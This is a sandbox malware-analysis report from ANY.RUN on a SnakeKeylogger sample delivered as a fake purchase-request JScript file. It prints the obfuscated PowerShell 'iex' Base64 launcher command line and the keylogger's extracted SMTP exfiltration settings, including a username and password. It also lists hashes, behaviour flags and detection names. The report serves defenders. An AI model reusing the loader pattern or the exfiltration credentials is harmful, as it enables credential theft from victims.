File name: 4e5de3dba8ee1e3ea841feb67b4a6350a6796f019c20859939a8c8be0d33402d.zip

Full analysis: https://app.any.run/tasks/ff8bb3a4-c3f8-4164-9005-2f57b0529dd8
Verdict: Malicious activity
Threats:
A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect victims' personal information, which may include online banking credentials as well as personal conversations. The most widespread attack vector leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Analysis date: March 03, 2026, 09:57:20
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: arch-scr, evasion, snake, keylogger, telegram, stealer, spyware, susp-powershell
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: ACB36F3EF8C8BC21534E450583E577ED
SHA1: 2059A3023511A60D3FC2D839488304C6B0889980
SHA256: 4E5DE3DBA8EE1E3EA841FEB67B4A6350A6796F019C20859939A8C8BE0D33402D
SSDEEP: 98304:htOAsbCsLsR+1LGDToMJnURzAqf3LAG5wFf/tDkSfWXaFZv+pXuOcIYZfAFGCnIi:rTZ2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Uses base64 encoding (SCRIPT)
      • wscript.exe (PID: 6020)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Uses AES cipher (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Dynamically loads an assembly (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Steals credentials from web browsers
      • powershell.exe (PID: 2788)
    • Actions look like stealing of personal data
      • powershell.exe (PID: 2788)
    • SNAKE has been detected (YARA)
      • powershell.exe (PID: 2788)
    • SNAKE has been detected (SURICATA)
      • powershell.exe (PID: 2788)
  • SUSPICIOUS
    • Sets XML DOM element text (SCRIPT)
      • wscript.exe (PID: 6020)
    • Writes binary data to a Stream object (SCRIPT)
      • wscript.exe (PID: 6020)
    • Creates a FileSystem object to access the computer's file system (SCRIPT)
      • wscript.exe (PID: 6020)
    • Creates XML DOM element (SCRIPT)
      • wscript.exe (PID: 6020)
    • The process executes JS scripts
      • wscript.exe (PID: 6020)
    • Gets name of the script (SCRIPT)
      • wscript.exe (PID: 6020)
    • Script creates XML DOM node (SCRIPT)
      • wscript.exe (PID: 6020)
    • Changes charset (SCRIPT)
      • wscript.exe (PID: 6020)
    • Saves data to a binary file (SCRIPT)
      • wscript.exe (PID: 6020)
    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)
      • wscript.exe (PID: 6020)
    • Runs shell command (SCRIPT)
      • wscript.exe (PID: 6020)
    • Character substitution obfuscation via .replace()
      • powershell.exe (PID: 2788)
    • Executes script without checking the security policy
      • powershell.exe (PID: 2788)
    • The process bypasses the loading of PowerShell profile settings
      • wscript.exe (PID: 6020)
    • Probably obfuscated PowerShell command line is found
      • wscript.exe (PID: 6020)
    • Starts POWERSHELL.EXE for command execution
      • wscript.exe (PID: 6020)
    • Uses base64 encoding (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Writes data to a memory stream (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Checks for external IP
      • svchost.exe (PID: 2292)
      • powershell.exe (PID: 2788)
    • Connects to SMTP port
      • powershell.exe (PID: 2788)
    • Possible stealing of FTP data
      • powershell.exe (PID: 2788)
    • Possible stealing of messenger data
      • powershell.exe (PID: 2788)
    • Loads DLL from Mozilla Firefox
      • powershell.exe (PID: 2788)
    • Possibly malicious use of IEX has been detected
      • powershell.exe (PID: 2788)
    • Possible stealing of email data
      • powershell.exe (PID: 2788)
    • Possible stealing from browsers
      • powershell.exe (PID: 2788)
  • INFO
    • Generic archive extractor
      • WinRAR.exe (PID: 8456)
    • Drops script file
      • wscript.exe (PID: 6020)
      • powershell.exe (PID: 2788)
    • Manual execution by a user
      • wscript.exe (PID: 6020)
    • Creates a byte array (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Uses string replace method (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Converts byte array into Unicode string (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Gets data length (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Checks whether the specified file exists (POWERSHELL)
      • powershell.exe (PID: 2788)
    • Disables trace logs
      • powershell.exe (PID: 2788)
    • Checks proxy server information
      • powershell.exe (PID: 2788)
      • slui.exe (PID: 3920)
    • Found Base64 encoded text manipulation via PowerShell (YARA)
      • powershell.exe (PID: 2788)
SnakeKeylogger configuration (PID 2788, powershell.exe)

Keys:
  • DES: 6fc98cd68a1aab8b
Options:
  • SMTP User: snakesender@exzwzc.com
  • SMTP Password: Qwerty!@#
  • SMTP Host: cphost17.qhoster.net
  • SMTP SendTo: kingmethodlogs2026@exzwzc.com
  • SMTP Port: 587

TRiD: .zip | ZIP compressed archive (100)

EXIF (ZIP):
  • ZipRequiredVersion: 20
  • ZipBitFlag: -
  • ZipCompression: Deflated
  • ZipModifyDate: 2026:03:02 22:55:48
  • ZipCRC: 0xd3d890b0
  • ZipCompressedSize: 2155936
  • ZipUncompressedSize: 4304537
  • ZipFileName: RFQ 07283 and PO Request.JS
Total processes: 148
Monitored processes: 6
Malicious processes: 2
Suspicious processes: 0

Behavior graph (interactive view in the full report; process chain reconstructed from the parent-process column below):
explorer.exe -> winrar.exe (no specs)
explorer.exe -> wscript.exe (no specs) -> powershell.exe (#SNAKE) -> conhost.exe (no specs)
services.exe -> svchost.exe -> slui.exe

Process information

PID: 2292
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\svchost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll, c:\windows\system32\kernel.appcore.dll

PID: 2788
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Noexit -nop -c iex([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(('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TUVPJJRWO'.Replace('TUVPJJRWO','')))))
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
Indicators: SnakeKeylogger (configuration listed above)
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\oleaut32.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll, c:\windows\system32\atl.dll

PID: 2912
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 3920
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\slui.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\user32.dll

PID: 6020
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\RFQ 07283 and PO Request.JS"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.812.10240.16384
Modules (images): c:\windows\system32\wscript.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\oleaut32.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 8456
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\4e5de3dba8ee1e3ea841feb67b4a6350a6796f019c20859939a8c8be0d33402d.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.91.0
Modules (images): c:\program files\winrar\winrar.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\user32.dll, c:\windows\system32\win32u.dll, c:\windows\system32\gdi32.dll, c:\windows\system32\gdi32full.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll
Total events: 15 007
Read events: 14 995
Write events: 12
Delete events: 0

Modification events (registry writes)

  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes | Operation: write | Name: ShellExtBMP | Value: (empty)
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes | Operation: write | Name: ShellExtIcon | Value: (empty)
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 3 | Value: C:\Users\admin\Desktop\chromium_ext.zip
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 2 | Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 1 | Value: C:\Users\admin\Downloads\chromium_build 1.zip
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 0 | Value: C:\Users\admin\Desktop\4e5de3dba8ee1e3ea841feb67b4a6350a6796f019c20859939a8c8be0d33402d.zip
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: name | Value: 120
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: size | Value: 80
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: type | Value: 120
  • (PID 8456) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: mtime | Value: 100
Executable files: 0
Suspicious files: 1
Text files: 6
Unknown types: 0

Dropped files (PID | Process | Filename | Type)

  • 6020 | wscript.exe | C:\Users\Public\Mands.png | text
    MD5: 62DA9FB7DAABAE46E3D37C16B34D8588
    SHA256: 3638971EA743E157E4F3CD05F91055D26721AC2769E352D8E16EBA41D15514D8
  • 2788 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5cghunip.rlc.ps1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  • 2788 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cfrhuivv.ror.psm1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  • 6020 | wscript.exe | C:\Users\Public\Vile.png | text
    MD5: 5BC5BB8CE8D536C3351963942ED30E33
    SHA256: 3F5F3931276CD40AD23525167632E4FAE310AA3C9BDB8B4F735DBD0800D3ABC7
  • 2788 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
    MD5: C657B13234B1F96F854617A050F69CA0
    SHA256: 6CA8731008A09A8B01A1AF8A3CD629D52E6CBDB981BE79557DA991A1FE1E6773
  • 2788 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y4qn1ym2.gss.psm1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  • 2788 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xelqokyh.fer.ps1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 84
TCP/UDP connections: 55
DNS requests: 23
Threats: 29

HTTP requests (PID | Process | Method | HTTP Code | IP | CN | Type | Size | Reputation; URL on the following line)

  • 4936 | RUXIMICS.exe | GET | 304 | 40.127.240.158:443 | US | whitelisted
    https://settings-win.data.microsoft.com/settings/v3.0/WSD/RUXIM?os=Windows&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3623&OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&FlightRing=Retail&AttrDataVer=186&App=RUXIM&AppVer=&DeviceFamily=Windows.Desktop
  • 6768 | MoUsoCoreWorker.exe | GET | 304 | 40.127.240.158:443 | US | whitelisted
    https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
  • 6768 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.49:80 | NL | binary | 825 b | whitelisted
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
  • 4936 | RUXIMICS.exe | GET | 200 | 2.16.164.49:80 | NL | binary | 825 b | whitelisted
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
  • 4936 | RUXIMICS.exe | GET | 200 | 88.221.169.152:80 | US | binary | 814 b | whitelisted
    http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
  • 6320 | svchost.exe | GET | 200 | 2.16.164.49:80 | NL | binary | 825 b | whitelisted
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
  • 6768 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | US | binary | 814 b | whitelisted
    http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
  • 6320 | svchost.exe | GET | 200 | 40.127.240.158:443 | US | text | 3.41 Kb | whitelisted
    https://settings-win.data.microsoft.com/settings/v3.0/WSD/WaasMedic?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&appVer=10.0.19041.3758&ring=Retail&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4
  • 6320 | svchost.exe | GET | 200 | 88.221.169.152:80 | US | binary | 814 b | whitelisted
    http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
  • (no PID) | (no process) | POST | 200 | 20.190.159.2:443 | US | binary | 11.1 Kb | whitelisted
    https://login.live.com/RST2.srf

Connections (PID | Process | IP | Domain | ASN | CN | Reputation)

  • 4 | System | 192.168.100.255:137 | Not routed | whitelisted
  • 6320 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
  • 4936 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
  • 6768 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
  • (no PID) | (no process) | 2.16.241.207:443 | www.bing.com | AKAMAI-ASN1 | NL | whitelisted
  • (no PID) | (no process) | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
  • 4 | System | 192.168.100.255:138 | Not routed | whitelisted
  • 4936 | RUXIMICS.exe | 2.16.164.49:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
  • 6768 | MoUsoCoreWorker.exe | 2.16.164.49:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
  • 6320 | svchost.exe | 2.16.164.49:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted

DNS requests (Domain | Resolved IPs | Reputation)

  • settings-win.data.microsoft.com | 40.127.240.158, 20.73.194.208 | whitelisted
  • self.events.data.microsoft.com | 52.168.117.169, 20.189.173.25 | whitelisted
  • www.bing.com | 2.16.241.207, 2.16.241.202, 2.16.241.209, 2.16.241.198, 2.16.241.205, 2.16.241.200, 2.16.241.206, 2.16.241.208, 2.16.241.226 | whitelisted
  • client.wns.windows.com | 172.211.123.248 | whitelisted
  • google.com | 142.251.143.110 | whitelisted
  • crl.microsoft.com | 2.16.164.49, 2.16.164.120 | whitelisted
  • www.microsoft.com | 88.221.169.152, 23.52.181.212 | whitelisted
  • login.live.com | 40.126.31.71, 20.190.159.0, 40.126.31.69, 20.190.159.128, 20.190.159.64, 40.126.31.128, 20.190.159.130, 20.190.159.75 | whitelisted
  • checkip.dyndns.org | 193.122.130.0, 193.122.6.168, 158.101.44.242, 132.226.247.73, 132.226.8.169 | whitelisted
  • reallyfreegeoip.org | 188.114.97.3, 188.114.96.3 | shared

Threats (PID | Process | Class | Message)

  • 4936 | RUXIMICS.exe | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
  • 2292 | svchost.exe | Device Retrieving External IP Address Detected | ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org)
  • 2788 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org
  • 2292 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
  • 2788 | powershell.exe | Misc activity | ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
  • 2788 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO 404/Snake/Matiex Keylogger Style External IP Check
  • 2292 | svchost.exe | Misc activity | ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
  • 2788 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org
  • 2788 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org
  • 2788 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org